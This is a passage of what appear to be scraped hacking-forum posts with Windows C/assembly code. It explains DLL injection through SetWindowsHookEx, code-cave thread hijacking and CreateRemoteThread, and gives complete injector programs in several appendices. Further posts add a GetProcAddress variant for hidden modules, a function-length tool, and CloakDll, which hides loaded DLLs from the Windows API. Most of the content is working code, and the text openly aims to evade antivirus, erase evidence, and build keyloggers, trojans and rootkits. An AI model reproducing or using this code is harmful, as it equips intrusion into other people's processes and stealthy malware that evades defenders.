), however we'll want to use one that's as unintrusive as possible, and has the least likelihood of causing alarm bells to go off in any AV software(SetWindowsHookEx is the staple of all ring3 keyloggers). The WH_CBT message seems innocuous enough. WH_CBT Installs a hook procedure that receives notifications useful to a computer-based training (CBT) application. For more information, see the CBTProc hook procedure. --MSDN So, we'll need to create a placebo CBT hook proc in our dll, so that when the hook is called, we can handle it properly. LRESULT CALLBACK CBTProc(int nCode, WPARAM wParam, LPARAM lParam) { return CallNextHookEx(0, nCode, wParam, lParam); }; All we're doing is calling the next hook in the chain of hooks that exist for this message. Getting back to the SetWindowsHookEx() function, the next parameter we see is lpfn. lpfn is exactly as it sounds "long pointer to function". That's a pointer to our CBT hook proc function. So, to get this, we'll have to either hardcode the address, or load the dll first ourselves. Hardcoding anything is a bad idea, so we'll load the dll using LoadLibrary(), and use GetProcAddress() to get the address of our function. HMODULE hDll; unsigned long cbtProcAddr; hDll = LoadLibrary("injected.dll"); cbtProcAddr = GetProcAddress(hDll, "CBTProc"); Now, in cbtProcAddr we have the address of our function. Parameter 3, of SetWindowsHookEx() is a handle to our dll, we've already obtained this in the process of getting the address of CBTProc(hDll is a handle to our dll, returned by LoadLibrary). Now, there is only one parameter left in the SetWindowsHookEx() function, the dwThreadId parameter. If you want to inject your dll into every process on the system(useful for global function hooks, keyloggers, trojans, rootkits, etc..) you can simply specify 0 for this parameter. If you want to target a specific process, you'll need to get the ID of one of it's threads. There are many ways of doing this, and i'll try to enumerate as many as I can think of in Appendix B. So, to put it all together into one neat little function: BOOL InjectDll(char *dllName) { HMODULE hDll; unsigned long cbtProcAddr; hDll = LoadLibrary(dllName); cbtProcAddr = GetProcAddress(hDll, "CBTProc"); SetWindowsHookEx(WH_CBT, cbtProcAddr, hDll, GetTargetThreadIdFromWindow("targetApp")); return TRUE; } The code cave method Instead of exploiting a windows API function to force the process to load our Dll, this time we'll allocate a little chunk memory inside the target application, and inject a little stub that loads our dll. The advantage of this approach is that it will work on any version of windows, and it's also the least detectable of any of the methods mentioned thus far. Our stub will look like this: __declspec(naked) loadDll(void) { _asm{ // Placeholder for the return address push 0xDEADBEEF // Save the flags and registers pushfd pushad // Placeholder for the string address and LoadLibrary push 0xDEADBEEF mov eax, 0xDEADBEEF // Call LoadLibrary with the string parameter call eax // Restore the registers and flags popad popfd // Return control to the hijacked thread ret } } 0xDEADBEEF is just there to mark addresses that we can't know beforehand, and have to patch-in at runtime. Ok, let's make a list of the things that we need to do to make this work: - Allocate space for the stub - Allocate space for the name of the dll - Suspend the main thread of our target - Get the address of the next instruction to be executed(need this for the next step) - Patch the proper address to return to in the stub - Patch the address of the dll name - Patch the address of LoadLibrary - Set the address of the next instruction to be executed in our target's thread, to the address of the beginning of our stub - Resume the target's thread To allocate space inside the target, we'll use VirtualAllocEx(). We'll need to open a handle to the process with the VM_OPERATION privelege specified, in order to do this. For our dllName string, we'll only need read and write priveleges. For the stub however, we'll need read, write, and execute priveleges. Then we'll write in our dllName string, so that we can reference it from the stub once it's inserted. void *dllString, *stub; unsigned long wowID; HANDLE hProcess //See Appendix A for //this function wowID = GetTargetProcessIdFromProcname(PROC_NAME); hProcess = OpenProcess((PROCESS_VM_WRITE | PROCESS_VM_OPERATION), false, wowID); dllString = VirtualAllocEx(hProcess, NULL, (strlen(DLL_NAME) + 1), MEM_COMMIT, PAGE_READWRITE); stub = VirtualAllocEx(hProcess, NULL, stubLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemory(hProcess, dllString, DLL_NAME, strlen(DLL_NAME), NULL); To accomplish our next few tasks, we'll need a handle to one of our target's threads. We can use the functions from Appendix B to get the ID of one such thread, and then use the OpenThread API to get a handle. We'll need to be able to get and set context, and also suspend and resume the thread. unsigned long threadID; HANDLE hThread; threadID = GetTargetThreadIdFromProcname(PROC_NAME); hThread = OpenThread((THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME), false, threadID); Now, we need to pause the thread in order to get it's "context". The context of a thread is the current state of all of it's registers, as well as other peripheral information. However, we're mostly concerned with the EIP register, which points to the next instruction to be executed. So, if we don't suspend the thread before retrieving its context information, it'll continue executing and by the time we get the information, it'll be invalid. Once we've paused the thread, we'll retrieve it's context information using the GetThreadContext() function. We'll grab the value of the current next instruction to be executed, so that we know where our stub should return to. Then it's just a matter of patching up the stub to have all of the proper pointers, and forcing the thread to execute it: SuspendThread(hThread); ctx.ContextFlags = CONTEXT_CONTROL; GetThreadContext(hThread, &ctx); oldIP = ctx.Eip; //Set the EIP of the context to the address of our stub ctx.Eip = (DWORD)stub; ctx.ContextFlags = CONTEXT_CONTROL; //Right now loadDll is code, which isn't writable. We need //to change that. VirtualProtect(loadDll, stubLen, PAGE_EXECUTE_READWRITE, &oldprot); //Patch the first push instruction memcpy((void *)((unsigned long)loadDll + 1), &oldIP, 4); //Patch the 2nd push instruction memcpy((void *)((unsigned long)loadDll + 8), &dllString, 4); //Patch the mov eax, 0xDEADBEEF to mov eax, LoadLibrary memcpy((void *)((unsigned long)loadDll + 13), &loadLibAddy, 4); WriteProcessMemory(hProcess, stub, loadDll, stubLen, NULL); //Write the stub into the target //Set the new context of the target's thread SetThreadContext(hThread, &ctx); //Let the target thread continue execution, starting at our stub ResumeThread(hThread); All that's left now, is to cleanup the evidence. Before we do that though, we should pause the injector for a bit, to be sure that the target has time to execute our stub(don't want any nasty race conditions). We'll use Sleep() to pause for 8 seconds before unmapping the memory that we allocated, and exiting the injector. Sleep(8000); VirtualFreeEx(hProcess, dllString, strlen(DLL_NAME), MEM_DECOMMIT); VirtualFreeEx(hProcess, stub, stubLen, MEM_DECOMMIT); CloseHandle(hProcess); CloseHandle(hThread); This method should work on any version of windows, and should be the least likely to trigger any A/V alarms or cause the program to malfunction. If you can understand it and implement it properly, this is definitely the best of the three methods. Appendix A - Methods of obtaining a process ID If the process you're targeting has a window, you can use the FindWindow function, in conjunction with GetWindowThreadProcessId, as shown here unsigned long GetTargetProcessIdFromWindow(char *className, char *windowName) { unsigned long procID; HWND targetWnd; targetWnd = FindWindow(className, windowName); GetWindowThreadProcessId(targetWnd, &procId); return procID; } If you only know the name of the executable file or it just doesn't have a window: unsigned long GetTargetProcessIdFromProcname(char *procName) { PROCESSENTRY32 pe; HANDLE thSnapshot; BOOL retval, ProcFound = false; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Error: unable to create toolhelp snapshot", "Loader", NULL); return false; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, procName) ) { ProcFound = true; break; } retval = Process32Next(thSnapshot,&pe); pe.dwSize = sizeof(PROCESSENTRY32); } return pe.th32ProcessID; } Appendix B - Methods of obtaining a thread ID If the process you're targeting has a window, you can use the FindWindow function, in conjunction with GetWindowThreadProcessId and the toolhelp API, as shown here: unsigned long GetTargetThreadIdFromWindow(char *className, char *windowName) { HWND targetWnd; HANDLE hProcess unsigned long processId, pTID, threadID; targetWnd = FindWindow(className, windowName); GetWindowThreadProcessId(targetWnd, &processId); _asm { mov eax, fs:[0x18] add eax, 36 mov [pTID], eax } hProcess = OpenProcess(PROCESS_VM_READ, false, processID); ReadProcessMemory(hProcess, (const void *)pTID, &threadID, 4, NULL); CloseHandle(hProcess); return threadID; } If you only know the name of the executable of your target, then you can use this code to locate it: unsigned long GetTargetThreadIdFromProcname(char *procName) { PROCESSENTRY32 pe; HANDLE thSnapshot, hProcess; BOOL retval, ProcFound = false; unsigned long pTID, threadID; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Error: unable to create toolhelp snapshot", "Loader", NULL); return false; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, procName) ) { ProcFound = true; break; } retval = Process32Next(thSnapshot,&pe); pe.dwSize = sizeof(PROCESSENTRY32); } CloseHandle(thSnapshot); _asm { mov eax, fs:[0x18] add eax, 36 mov [pTID], eax } hProcess = OpenProcess(PROCESS_VM_READ, false, pe.th32ProcessID); ReadProcessMemory(hProcess, (const void *)pTID, &threadID, 4, NULL); CloseHandle(hProcess); return threadID; } Appendix C - CreateRemoteThread complete example source code #include <windows.h> #include <stdio.h> #include <tlhelp32.h> #include <shlwapi.h> #define PROCESS_NAME "target.exe" #define DLL_NAME "injected.dll" //I could just use PROCESS_ALL_ACCESS but it's always best to use the absolute bare minimum of priveleges, so that your code works in as //many circumstances as possible. #define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ) BOOL WriteProcessBYTES(HANDLE hProcess,LPVOID lpBaseAddress,LPCVOID lpBuffer,SIZE_T nSize); BOOL LoadDll(char *procName, char *dllName); BOOL InjectDLL(DWORD ProcessID, char *dllName); unsigned long GetTargetProcessIdFromProcname(char *procName); bool IsWindowsNT() { // check current version of Windows DWORD version = GetVersion(); // parse return DWORD majorVersion = (DWORD)(LOBYTE(LOWORD(version))); DWORD minorVersion = (DWORD)(HIBYTE(LOWORD(version))); return (version < 0x80000000); } int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) { if(IsWindowsNT()) LoadDll(PROCESS_NAME, DLL_NAME); else MessageBox(0, "Your system does not support this method", "Error!", 0); return 0; } BOOL LoadDll(char *procName, char *dllName) { DWORD ProcID = 0; ProcID = GetProcID(procName); if(!(InjectDLL(ProcID, dllName))) MessageBox(NULL, "Process located, but injection failed", "Loader", NULL); return true; } BOOL InjectDLL(DWORD ProcessID, char *dllName) { HANDLE Proc; char buf[50]={0}; LPVOID RemoteString, LoadLibAddy; if(!ProcessID) return false; Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID); if(!Proc) { sprintf(buf, "OpenProcess() failed: %d", GetLastError()); MessageBox(NULL, buf, "Loader", NULL); return false; } LoadLibAddy = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); RemoteString = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(DLL_NAME), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(Proc, (LPVOID)RemoteString, dllName, strlen(dllName), NULL); CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddy, (LPVOID)RemoteString, NULL, NULL); CloseHandle(Proc); return true; } unsigned long GetTargetProcessIdFromProcname(char *procName) { PROCESSENTRY32 pe; HANDLE thSnapshot; BOOL retval, ProcFound = false; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Error: unable to create toolhelp snapshot", "Loader", NULL); return false; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, procName) ) { ProcFound = true; break; } retval = Process32Next(thSnapshot,&pe); pe.dwSize = sizeof(PROCESSENTRY32); } return pe.th32ProcessID; } Appendix D - SetWindowsHookEx complete example source code #include <windows.h> #include <tlhelp32.h> #define PROC_NAME "target.exe" #define DLL_NAME "injected.dll" void LoadDll(char *procName, char *dllName); unsigned long GetTargetThreadIdFromProcname(char *procName); int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) { LoadDll(PROC_NAME, DLL_NAME); return 0; } void LoadDll(char *procName, char *dllName) { HMODULE hDll; unsigned long cbtProcAddr; hDll = LoadLibrary(dllName); cbtProcAddr = GetProcAddress(hDll, "CBTProc"); SetWindowsHookEx(WH_CBT, cbtProcAddr, hDll, GetTargetThreadIdFromProcName(procName)); return TRUE; } unsigned long GetTargetThreadIdFromProcname(char *procName) { PROCESSENTRY32 pe; HANDLE thSnapshot, hProcess; BOOL retval, ProcFound = false; unsigned long pTID, threadID; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Error: unable to create toolhelp snapshot", "Loader", NULL); return false; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, procName) ) { ProcFound = true; break; } retval = Process32Next(thSnapshot,&pe); pe.dwSize = sizeof(PROCESSENTRY32); } CloseHandle(thSnapshot); _asm { mov eax, fs:[0x18] add eax, 36 mov [pTID], eax } hProcess = OpenProcess(PROCESS_VM_READ, false, pe.th32ProcessID); ReadProcessMemory(hProcess, (const void *)pTID, &threadID, 4, NULL); CloseHandle(hProcess); return threadID; } Appendix E - Code cave example source code #include <windows.h> #include <tlhelp32.h> #include <shlwapi.h> #define PROC_NAME "target.exe" #define DLL_NAME "injected.dll" unsigned long GetTargetProcessIdFromProcname(char *procName); unsigned long GetTargetThreadIdFromProcname(char *procName); __declspec(naked) loadDll(void) { _asm{ // Placeholder for the return address push 0xDEADBEEF // Save the flags and registers pushfd pushad // Placeholder for the string address and LoadLibrary push 0xDEADBEEF mov eax, 0xDEADBEEF // Call LoadLibrary with the string parameter call eax // Restore the registers and flags popad popfd // Return control to the hijacked thread ret } } __declspec(naked) loadDll_end(void) { } int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) { void *dllString; void *stub; unsigned long wowID, threadID, stubLen, oldIP, oldprot, loadLibAddy; HANDLE hProcess, hThread; CONTEXT ctx; stubLen = (unsigned long)loadDll_end - (unsigned long)loadDll; loadLibAddy = (unsigned long)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); wowID = GetTargetProcessIdFromProcname(PROC_NAME); hProcess = OpenProcess((PROCESS_VM_WRITE | PROCESS_VM_OPERATION), false, wowID); dllString = VirtualAllocEx(hProcess, NULL, (strlen(DLL_NAME) + 1), MEM_COMMIT, PAGE_READWRITE); stub = VirtualAllocEx(hProcess, NULL, stubLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemory(hProcess, dllString, DLL_NAME, strlen(DLL_NAME), NULL); threadID = GetTargetThreadIdFromProcname(PROC_NAME); hThread = OpenThread((THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME), false, threadID); SuspendThread(hThread); ctx.ContextFlags = CONTEXT_CONTROL; GetThreadContext(hThread, &ctx); oldIP = ctx.Eip; ctx.Eip = (DWORD)stub; ctx.ContextFlags = CONTEXT_CONTROL; VirtualProtect(loadDll, stubLen, PAGE_EXECUTE_READWRITE, &oldprot); memcpy((void *)((unsigned long)loadDll + 1), &oldIP, 4); memcpy((void *)((unsigned long)loadDll + 8), &dllString, 4); memcpy((void *)((unsigned long)loadDll + 13), &loadLibAddy, 4); WriteProcessMemory(hProcess, stub, loadDll, stubLen, NULL); SetThreadContext(hThread, &ctx); ResumeThread(hThread); Sleep(8000); VirtualFreeEx(hProcess, dllString, strlen(DLL_NAME), MEM_DECOMMIT); VirtualFreeEx(hProcess, stub, stubLen, MEM_DECOMMIT); CloseHandle(hProcess); CloseHandle(hThread); return 0; } unsigned long GetTargetProcessIdFromProcname(char *procName) { PROCESSENTRY32 pe; HANDLE thSnapshot; BOOL retval, ProcFound = false; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Error: unable to create toolhelp snapshot", "Loader", NULL); return false; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, procName) ) { ProcFound = true; break; } retval = Process32Next(thSnapshot,&pe); pe.dwSize = sizeof(PROCESSENTRY32); } CloseHandle(thSnapshot); return pe.th32ProcessID; } unsigned long GetTargetThreadIdFromProcname(char *procName) { PROCESSENTRY32 pe; HANDLE thSnapshot, hProcess; BOOL retval, ProcFound = false; unsigned long pTID, threadID; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Error: unable to create toolhelp snapshot", "Loader", NULL); return false; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, procName) ) { ProcFound = true; break; } retval = Process32Next(thSnapshot,&pe); pe.dwSize = sizeof(PROCESSENTRY32); } CloseHandle(thSnapshot); _asm { mov eax, fs:[0x18] add eax, 36 mov [pTID], eax } hProcess = OpenProcess(PROCESS_VM_READ, false, pe.th32ProcessID); ReadProcessMemory(hProcess, (const void *)pTID, &threadID, 4, NULL); CloseHandle(hProcess); return threadID; } Sursa: ic0de.org

[sNIPPET] Improvements to GetProcAddress() // GetProcAddress2 - by Darawk // Featured @ www.RealmGX.com & www.Darawk.com // // GetProcAddress2 is essentially identical to the // windows API function GetProcAddress, with one // key difference. GetProcAddress2 does not check // to make sure the module handle that's passed to // it is in the loaded modules list. GetProcAddress2 // is designed to be used in conjunction with ManualMap // or CloakDll. It allows you to access functions that // have been exported from a dll loaded by ManualMap or // cloaked by CloakDll. This functionality is necessary // for plugin-based applications and late-binding functions. #include <windows.h></windows.h> #define IMAGE_DIRECTORY_ENTRY_EXPORT 0 // Pietrek's macro // // MakePtr is a macro that allows you to easily add to values (including // pointers) together without dealing with C's pointer arithmetic. It // essentially treats the last two parameters as DWORDs. The first // parameter is used to typecast the result to the appropriate pointer type. #define MakePtr( cast, ptr, addValue ) (cast)( (DWORD_PTR)(ptr) + (DWORD_PTR)(addValue)) // This one is mine, but obviously..."adapted" from matt's original idea =p #define MakeDelta(cast, x, y) (cast) ( (DWORD_PTR)(x) - (DWORD_PTR)(y)) // My modified version of pietrek's function, to work with PE files that have // already been mapped into memory. LPVOID GetPtrFromRVA( DWORD, IMAGE_NT_HEADERS *, PBYTE, bool); FARPROC GetProcAddress2(HMODULE hMod, char *func) { IMAGE_DOS_HEADER *dosHd; IMAGE_NT_HEADERS *ntHd; IMAGE_EXPORT_DIRECTORY *ied; char **names; unsigned short *ordinals; FARPROC *funcs; // Make sure we got a valid pointer if(!hMod || hMod == INVALID_HANDLE_VALUE) return NULL; dosHd = (IMAGE_DOS_HEADER *)hMod; // Verify the DOS header if(dosHd->e_magic != IMAGE_DOS_SIGNATURE) return NULL; ntHd = MakePtr(IMAGE_NT_HEADERS *, hMod, dosHd->e_lfanew); // Verify the NT header if(ntHd->Signature != IMAGE_NT_SIGNATURE) return NULL; ied = (IMAGE_EXPORT_DIRECTORY *)GetPtrFromRVA((DWORD)(ntHd->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress), ntHd, (PBYTE)hMod, true); names = (char **)GetPtrFromRVA(ied->AddressOfNames, ntHd, (PBYTE)hMod, true); ordinals = (unsigned short *)GetPtrFromRVA(ied->AddressOfNameOrdinals, ntHd, (PBYTE)hMod, true); funcs = (FARPROC *)GetPtrFromRVA(ied->AddressOfFunctions, ntHd, (PBYTE)hMod, true); unsigned int i; for(i = 0; i < ied->NumberOfNames; i++) if(!stricmp((char *)GetPtrFromRVA((DWORD)names[i], ntHd, (PBYTE)hMod, true), func)) break; if(i >= ied->NumberOfNames) return NULL; return MakePtr(FARPROC, hMod, funcs[ordinals[i]]); } // Matt Pietrek's function PIMAGE_SECTION_HEADER GetEnclosingSectionHeader(DWORD rva, PIMAGE_NT_HEADERS pNTHeader) { PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(pNTHeader); unsigned int i; for ( i = 0; i < pNTHeader->FileHeader.NumberOfSections; i++, section++ ) { // This 3 line idiocy is because Watcom's linker actually sets the // Misc.VirtualSize field to 0. (!!! - Retards....!!!) DWORD size = section->Misc.VirtualSize; if ( 0 == size ) size = section->SizeOfRawData; // Is the RVA within this section? if ( (rva >= section->VirtualAddress) && (rva < (section->VirtualAddress + size))) return section; } return 0; } unsigned long GetMappedSectionOffset(IMAGE_NT_HEADERS *ntHd, IMAGE_SECTION_HEADER *seHd, void *base) { IMAGE_SECTION_HEADER *section = IMAGE_FIRST_SECTION(ntHd); unsigned int i; unsigned long offset = MakeDelta(unsigned long, section, base); for(i = 0; i < ntHd->FileHeader.NumberOfSections; i++, section++) { if(section->Name == seHd->Name) { offset = MakeDelta(unsigned long, section->VirtualAddress, section->PointerToRawData); break; } //offset += (section->SizeOfRawData > ntHd->OptionalHeader.SectionAlignment ? // section->SizeOfRawData - ntHd->OptionalHeader.SectionAlignment : // ntHd->OptionalHeader.SectionAlignment - section->SizeOfRawData); } return offset; } // This function is also Pietrek's LPVOID GetPtrFromRVA( DWORD rva, IMAGE_NT_HEADERS *pNTHeader, PBYTE imageBase, bool mapped ) { PIMAGE_SECTION_HEADER pSectionHdr; INT delta; unsigned long offset = 0; pSectionHdr = GetEnclosingSectionHeader( rva, pNTHeader ); if(mapped) offset = GetMappedSectionOffset(pNTHeader, pSectionHdr, imageBase); if ( !pSectionHdr ) return 0; delta = (INT)(pSectionHdr->VirtualAddress-pSectionHdr->PointerToRawData); return (PVOID) ( imageBase + rva - delta + offset); } Sursa: ic0de.org

[sRC] Length of Function FuncLen.cpp #include <windows.h> #include <stdio.h> #include <vector> #include <iterator> #include <algorithm> #include "types.h" #include "FuncLen.h" /************************************************************************ Function length calculation algorithm - by Darawk: 1. Scan the function's code for branches, and record each branch. Stop upon reaching an end-point*. This group of instructions constitutes the current "block". 2. QSort the branch list 3. Recursively repeat steps 1 & 2 with each branch, skipping duplicates and intra-block branches. *end-point: A ret instruction or an unconditional backwards jump, that jumps to a previous block. ************************************************************************/ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { u32 len = GetFunctionLength(GetProcAddress(GetModuleHandle(moduleName), funcName)); char buf[256] = {0}; sprintf(buf, "%s in %s: %u bytes long", funcName, moduleName, len); MessageBox(NULL, buf, "Function Length", NULL); return 0; } u32 GetFunctionLength(void *begin) { void *end = GetFunctionEnd(begin); u32 delta = (u32)((DWORD_PTR)end - (DWORD_PTR)begin); delta += mlde32(end); return delta; } void *GetFunctionEnd(void *func) { void *block = func; vector<void *> branchList; // ptr now points to the end of this block void *blockend = GetBranchListFromBlock(block, branchList); // If there are no branches, then return // the empty list. If we don't have this // here the loop will crash on an empty // branch list. if(branchList.size() == 0) return blockend; // Sort the list so that we can identify and // discard, intra-block branches. And optimize // the removal of duplicates. std::sort(branchList.begin(), branchList.end()); void *prev = NULL; vector<void *>::iterator branch; for(branch = branchList.begin(); branch != branchList.end(); branch++) { // Skip branches that jump into a block we've already // processed. if(*branch < blockend || *branch == prev) continue; blockend = GetFunctionEnd(*branch); prev = *branch; } return blockend; } void *GetBranchListFromBlock(void *block, vector<void *> &branchList) { u8 *ptr = (u8 *)block; // If we reach an end-point, then this block is complete while(!IsEndPoint(ptr, block)) { // Record all branching instructions that we encounter void *address = GetBranchAddress(ptr); if(address) { branchList.push_back(address); } // Next instruction ptr += mlde32(ptr); } return ptr; } void *GetBranchAddress(u8 *instr) { s32 offset = 0; // This code will determine what type of branch it is, and // determine the address it will branch to. switch(*instr) { case INSTR_SHORTJMP: case INSTR_RELJCX: offset = (s32)(*(s8 *)(instr + 1)); offset += 2; break; case INSTR_RELJMP: offset = *(s32 *)(instr + 1); offset += 5; break; case INSTR_NEAR_PREFIX: if(*(instr + 1) >= INSTR_NEARJCC_BEGIN && *(instr + 1) <= INSTR_NEARJCC_END) { offset = *(s32 *)(instr + 2); offset += 5; } break; default: // Check to see if it's in the valid range of JCC values. // e.g. ja, je, jne, jb, etc.. if(*instr >= INSTR_SHORTJCC_BEGIN && *instr <= INSTR_SHORTJCC_END) { offset = (s32)*((s8 *)(instr + 1)); offset += 2; } break; } if(offset == 0) return NULL; return instr + offset; } bool IsEndPoint(u8 *instr, void *curblock) { void *address; s32 offset; switch(*instr) { case INSTR_RET: case INSTR_RETN: case INSTR_RETFN: case INSTR_RETF: return true; break; // The following two checks, look for an instance in which // an unconditional jump returns us to a previous block, // thus creating a pseudo-endpoint. case INSTR_SHORTJMP: offset = (s32)(*(s8 *)(instr + 1)); address = instr + offset; if(address <= curblock) return true; break; case INSTR_RELJMP: offset = *(s32 *)(instr + 1); address = instr + offset; if(address <= curblock) return true; break; default: return false; break; } return false; } FuncLen.h using namespace std; u32 GetFunctionLength(void *begin); bool IsEndPoint(u8 *instr, void *curblock); void *FindEndPoint(void *block); void *GetBranchAddress(u8 *instr); void *GetNextBlock(u8 *instr, void *curBlockEnd); void *GetFunctionEnd(void *func); void ConsolidateBlocks(vector<void *> &blocks); void *GetBranchListFromBlock(void *block, vector<void *> &branchList); char funcName[] = "WinExec"; char moduleName[] = "kernel32.dll"; extern "C" int __cdecl mlde32(void *codeptr); #define INSTR_NEAR_PREFIX 0x0F #define INSTR_SHORTJCC_BEGIN 0x70 #define INSTR_SHORTJCC_END 0x7F #define INSTR_NEARJCC_BEGIN 0x80 // Near's are prefixed with a 0x0F byte #define INSTR_NEARJCC_END 0x8F #define INSTR_RET 0xC2 #define INSTR_RETN 0xC3 #define INSTR_RETFN 0xCA #define INSTR_RETF 0xCB #define INSTR_RELJCX 0xE3 #define INSTR_RELJMP 0xE9 #define INSTR_SHORTJMP 0xEB mlde32.obj is included in archieve or from download //www.darawk.com/code/FuncLen/ Download (cu cont, atasament): http://www.ic0de.org/showthread.php?10442-SRC-Length-of-Function

[sRC] CloakDLL - Hide modules from winapi CloakDll.cpp // CloakDll - by Darawk // // The purpose of CloakDll is to allow the user to hide any loaded // module from the windows API. It works by accessing the modules // list stored in the PEB, and subsequently unlinking the module // in question from all 4 of the doubly-linked lists that it's a // node of. It then zeroes out the structure and the path/file // name of the module in memory. So that even if the memory where // the data about this module used to reside is scanned there will // still be no conclusive evidence of it's existence. At present // there is only one weakness that I have found in this method. // I'll describe how it may still be possible to discover at least // that a module has been hidden, after a brief introduction to how // the GetModuleHandle function works. // // *The following information is not documented by Microsoft. This // information consists of my findings while reverse-engineering // these functions and some of them may be incorrect and/or // subject to change at any time(and is almost definitely different // in different versions of windows, and maybe even in different // service packs). I've tried to make my code as version independant // as possible but certain parts of it may not work on older versions // of windows. I've tested it on XP SP2 and there i'll guarantee // that it works, but on any other versions of windows, it's anyone's // guess.* // // GetModuleHandle eventually calls GetModuleHandleExW, which in // turn accesses the native API function GetDllHandle, which calls // GetDllHandleEx. And it's not until here, that we actually see // anything even begin to look up information about loaded modules. // Whenever GetModuleHandle is called, it saves the address of the // last ModuleInfoNode structure that it found in a global variable // inside of ntdll. This global variable is the first thing // checked on all subsequent calls to GetModuleHandle. If the // handle being requested is not the one that was requested the last // time GetDllHandleEx calls the LdrpCheckForLoadedDll function. // LdrpCheckForLoadedDll begins by converting the first letter of the // module name being requested to uppercase, decrementing it by 1 and // AND'ing it with 0x1F. This effectively creates a 0-based index // beginning with the letter 'A'. The purpose of this is so that // the module can first be looked up in a hash table. The hash table // consists entirely of LIST_ENTRY structures. One for each letter // 'A' through 'Z'. The LIST_ENTRY structure points to the first // and last modules loaded that begin with the letter assigned to // that entry in the hash table. The Flink member being the first // loaded beginning with that letter, and the Blink member being the // last. The code scans through this list until it finds the module // that it's looking for. On the off-chance that it doesn't find it // there, or if the boolean argument UseLdrpHashTable is set to false // it will begin going through one of the other three lists. If, at // this point it still doesn't find it, it will admit defeat and return // 0 for the module handle. // // Weakness: The global variable inside ntdll that caches the pointer // to the last module looked up could be used to at least detect the // fact that a module has been hidden. The LdrUnloadDll() function // will set this value to 0 when it unloads a module, so if the cache // variable points to an empty structure, the only logical conclusion // would be a hidden module somewhere in the process. This could be // resolved by using the static address of this variable and simply // zeroing it out. However, this would make the code specific to only // one version of windows. You could also scan the address space of // ntdll for any occurences of the base address(aka module handle) // of the module you're hiding. However, this would be slow and it // would clutter up the CloakDll_stub function, because it'd have to // all be done manually. And i'd have to either use a static base // address for ntdll...which would probably work on most versions // of windows, however I really don't like using static addresses. // Or i'd have to manually locate it by writing my own unicode // string comparison code, to lookup ntdll in the list by it's name. // Realistically though anyone trying to detect this way would run // into the same problem. That their code would not be version // independant. So, it's unlikely to see any largescale deployment // of such a technique. However, anyone who would like to solve // this problem themselves is perfectly free, and encouraged to do // so. #include <windows.h> #include <winnt.h> #include <tlhelp32.h> #include <shlwapi.h> #pragma comment(lib, "shlwapi.lib") #define UPPERCASE(x) if((x) >= 'a' && (x) <= 'z') (x) -= 'a' - 'A' #define UNLINK(x) (x).Blink->Flink = (x).Flink; \ (x).Flink->Blink = (x).Blink; #pragma pack(push, 1) typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef struct _ModuleInfoNode { LIST_ENTRY LoadOrder; LIST_ENTRY InitOrder; LIST_ENTRY MemoryOrder; HMODULE baseAddress; // Base address AKA module handle unsigned long entryPoint; unsigned int size; // Size of the modules image UNICODE_STRING fullPath; UNICODE_STRING name; unsigned long flags; unsigned short LoadCount; unsigned short TlsIndex; LIST_ENTRY HashTable; // A linked list of any other modules that have the same first letter unsigned long timestamp; } ModuleInfoNode, *pModuleInfoNode; typedef struct _ProcessModuleInfo { unsigned int size; // Size of a ModuleInfo node? unsigned int initialized; HANDLE SsHandle; LIST_ENTRY LoadOrder; LIST_ENTRY InitOrder; LIST_ENTRY MemoryOrder; } ProcessModuleInfo, *pProcessModuleInfo; #pragma pack(pop) 